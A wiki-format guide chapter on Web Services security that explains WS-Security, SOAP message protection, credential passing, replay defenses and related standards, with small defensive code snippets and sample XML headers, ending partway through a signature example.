==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers, in log files (where it can be browsed by anybody) and local caches, aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
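A minimal illustration of that encode/decode round trip in Python:&lt;br /&gt;

```python
import base64

# A binary token (for example, a DER-encoded certificate) must become
# plain text before it can travel inside an XML message.
binary_token = bytes(range(256))              # stand-in for binary data
encoded = base64.b64encode(binary_token).decode("ascii")
restored = base64.b64decode(encoded)
assert restored == binary_token               # restored unambiguously
```

The encoded form is plain ASCII and therefore safe to embed in an XML element, at the cost of roughly a one-third size increase.&lt;br /&gt;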
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or simply never sent “in the clear”. Usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
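One common pattern, sketched below in Python, is to send a keyed digest of a fresh nonce and timestamp instead of the password itself; the protocol details here are illustrative and not taken from any particular standard:&lt;br /&gt;

```python
import hashlib, hmac, os, time

# Derive a shared key from the password; send a keyed digest of a
# fresh nonce and timestamp instead of the password itself.
# (Illustrative protocol sketch, not any particular standard.)
secret = hashlib.sha256(b"correct horse battery").digest()

def make_proof(nonce, created):
    return hmac.new(secret, nonce + created, hashlib.sha256).hexdigest()

nonce = os.urandom(16)
created = str(int(time.time())).encode()
proof = make_proof(nonce, created)   # this travels on the wire
# The server, knowing the same secret, recomputes and compares:
assert hmac.compare_digest(proof, make_proof(nonce, created))
```

An eavesdropper who captures the proof learns nothing useful for a later login, since the nonce and timestamp change on every exchange.&lt;br /&gt;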
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, where server or client clocks drift too far apart and prevent timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
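The two defenses can be combined, as in this illustrative Python sketch (the nonce cache and window size are arbitrary choices for the example):&lt;br /&gt;

```python
import time

seen_nonces = set()       # identifiers of already-processed messages
WINDOW_SECONDS = 300      # arbitrary validity window for the example

def accept(nonce, created, now=None):
    # Reject a message whose timestamp falls outside the validity
    # window, or whose nonce has already been processed (a replay).
    now = time.time() if now is None else now
    if abs(now - created) > WINDOW_SECONDS:
        return False      # stale message, or excessive clock skew
    if nonce in seen_nonces:
        return False      # replayed message
    seen_nonces.add(nonce)
    return True
```

The window also bounds how long nonces must be remembered, since anything older than the window is rejected by the timestamp check alone.&lt;br /&gt;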
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, the server must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Alterations may affect technical qualities of a SOAP message, such as the message’s timestamp, or its business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure packet integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
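A minimal HMAC sketch in Python shows how a keyed digest, unlike a plain checksum, ties the message to the holder of the shared key:&lt;br /&gt;

```python
import hashlib, hmac

key = b"secret shared by the two parties"

def protect(message):
    # Attach a keyed digest; unlike a checksum, it cannot be
    # recomputed by someone who lacks the key.
    return message, hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(message, tag):
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)
```

Tampering with either the message or the tag makes verification fail, which is exactly the property a plain checksum cannot provide.&lt;br /&gt;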
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for which communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks on Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces (consisting of messages, expressed as XML Schema, and operations) to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use the protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchanges. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0; work on version 1.1 of the specification is under way and is expected to be finished in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile documents, which define additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
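For illustration, a SOAP envelope carrying a WSS security header with a timestamp and a UsernameToken might look roughly as follows; the element layout follows the OASIS WSS 1.0 core and UsernameToken constructs, and all values shown are placeholders:&lt;br /&gt;

```xml
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <wsse:Security
        xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
        xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
      <wsu:Timestamp>
        <wsu:Created>2005-06-01T12:00:00Z</wsu:Created>
        <wsu:Expires>2005-06-01T12:05:00Z</wsu:Expires>
      </wsu:Timestamp>
      <wsse:UsernameToken>
        <wsse:Username>alice</wsse:Username>
        <wsse:Password>...</wsse:Password>
        <wsse:Nonce>...</wsse:Nonce>
        <wsu:Created>2005-06-01T12:00:00Z</wsu:Created>
      </wsse:UsernameToken>
    </wsse:Security>
  </soap:Header>
  <soap:Body>
    <!-- application payload -->
  </soap:Body>
</soap:Envelope>
```

Binary and XML tokens replace the UsernameToken element with profile-specific constructs, while the surrounding Security header stays the same.&lt;br /&gt;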
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as authenticity, integrity, and freshness, and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher-level protocols. Those protocols, based on standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard-to-detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that may appear in a valid security header, plus a set of profile documents. The profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken defined by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
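The Base64 round trip described above can be sketched in Python; the byte string here is just an illustrative stand-in for real certificate or signature bytes.&lt;br /&gt;

```python
import base64

# Stand-in for real binary content, e.g. a DER-encoded X.509 certificate.
binary_data = bytes([0x30, 0x82, 0x02, 0xB7, 0xFF, 0x00, 0x7F])

# Encode to ASCII so the bytes can be carried as XML element text.
encoded = base64.b64encode(binary_data).decode("ascii")
print(encoded)

# The receiver reverses the transform to recover the original bytes.
decoded = base64.b64decode(encoded)
assert decoded == binary_data
```

Note how DER-encoded certificates always begin with the bytes 0x30 0x82, which is why their Base64 form starts with the familiar “MII” prefix seen in the samples in this section.&lt;br /&gt;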
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message works as a sort of envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well: the letter (SOAP message) should not know, nor care, about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimal header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information that helps secure the message. This means including one or more security tokens (see 0) with references, as well as XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
